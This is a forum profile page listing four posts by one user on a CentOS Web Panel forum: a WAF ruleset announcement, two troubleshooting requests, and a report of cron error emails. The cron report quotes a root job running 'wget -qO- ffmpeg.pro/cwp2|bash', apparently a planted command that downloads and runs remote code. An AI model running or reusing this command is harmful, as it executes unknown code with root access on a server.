This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.
Pages: [1]
1
Mod_Security / Updated Comodo WAF Rules (2025/2026) for CWP & WordPress - Community Feedback
« on: February 11, 2026, 02:10:34 PM »
Hi everyone,
Since the official Comodo free ruleset hasn't been updated in over two years, I decided to take action. I have manually created an updated ruleset (2025/2026) to handle modern threats, specifically focusing on the new wave of AI scrapers and aggressive bots that cause unnecessary CPU/RAM drain.
I’ve been testing these rules on several high-traffic WordPress environments, and so far, the results are great: zero false positives in the admin area and significantly lower server load.
You can check out the updated rules and the documentation on my GitHub here:
https://github.com/sminozzi/SBB-WAF-Rules
Please feel free to test them out—I’m very open to feedback and suggestions if you see anything that could be improved!
Please note that there is no automatic installer for these updates. You will need the technical skills to manually replace the necessary files in your ModSecurity directories. Since environments can vary, I cannot provide individual support for the installation process. I highly recommend performing a full backup of your current rules before making any changes.
If you have any feedback or suggestions on how to improve these rules, please let me know. I'm always looking for ways to refine the protection and would love to hear about your experience with them.
Best regards,
Bill
Since the official Comodo free ruleset hasn't been updated in over two years, I decided to take action. I have manually created an updated ruleset (2025/2026) to handle modern threats, specifically focusing on the new wave of AI scrapers and aggressive bots that cause unnecessary CPU/RAM drain.
I’ve been testing these rules on several high-traffic WordPress environments, and so far, the results are great: zero false positives in the admin area and significantly lower server load.
You can check out the updated rules and the documentation on my GitHub here:
https://github.com/sminozzi/SBB-WAF-Rules
Please feel free to test them out—I’m very open to feedback and suggestions if you see anything that could be improved!
Please note that there is no automatic installer for these updates. You will need the technical skills to manually replace the necessary files in your ModSecurity directories. Since environments can vary, I cannot provide individual support for the installation process. I highly recommend performing a full backup of your current rules before making any changes.
If you have any feedback or suggestions on how to improve these rules, please let me know. I'm always looking for ways to refine the protection and would love to hear about your experience with them.
Best regards,
Bill
2
Information / Connection refused from ffmpeg.pro/cwp2|bash
« on: December 07, 2023, 01:37:12 PM »
Hi,
I'm receiving a lot of emails about fail to connect to ffmpeg.pro/cwp2|bash'
Subject: Cron <root@vmixxxxx> /bin/sh -c 'wget -qO- ffmpeg.pro/cwp2|bash'
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0curl: (7) Failed connect to 46.101.121.159:443; Connection refused
Regards,
Bill
I'm receiving a lot of emails about fail to connect to ffmpeg.pro/cwp2|bash'
Subject: Cron <root@vmixxxxx> /bin/sh -c 'wget -qO- ffmpeg.pro/cwp2|bash'
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0curl: (7) Failed connect to 46.101.121.159:443; Connection refused
Regards,
Bill
3
CentOS-WebPanel GUI / Error 500 on login - connection not secure
« on: August 02, 2022, 08:35:38 AM »
Hi,
All sites are working but the server dashboard. (by browser)
The server certificate expires in 2030.
I'm able to connect by terminal ssh.
This issue begins today.
No changes at all on server, domain, DNS, and so on last 30 days.
I made server reboot, didn't fix.
Thanks in advance.
Bill
All sites are working but the server dashboard. (by browser)
The server certificate expires in 2030.
I'm able to connect by terminal ssh.
This issue begins today.
No changes at all on server, domain, DNS, and so on last 30 days.
I made server reboot, didn't fix.
Thanks in advance.
Bill
4
Updates / After the update of today (Dec 21) Apache don't find my index files
« on: December 21, 2021, 12:18:34 PM »
Hi,
I tried:
a) Restart Server
b) Restart Apache
c) Rebuild Apache (before 2.4.51 now 2.4.48 (I'm unable to go to 2.4.51 - not available)
d) Rebuild Server as nginx & Apache
e) Rebuild Apache Only
f) Look my apache.conf and index.php is there (DirectoryIndex)
Nothing above works.
Cheers,
Bill
I tried:
a) Restart Server
b) Restart Apache
c) Rebuild Apache (before 2.4.51 now 2.4.48 (I'm unable to go to 2.4.51 - not available)
d) Rebuild Server as nginx & Apache
e) Rebuild Apache Only
f) Look my apache.conf and index.php is there (DirectoryIndex)
Nothing above works.
Cheers,
Bill
Pages: [1]
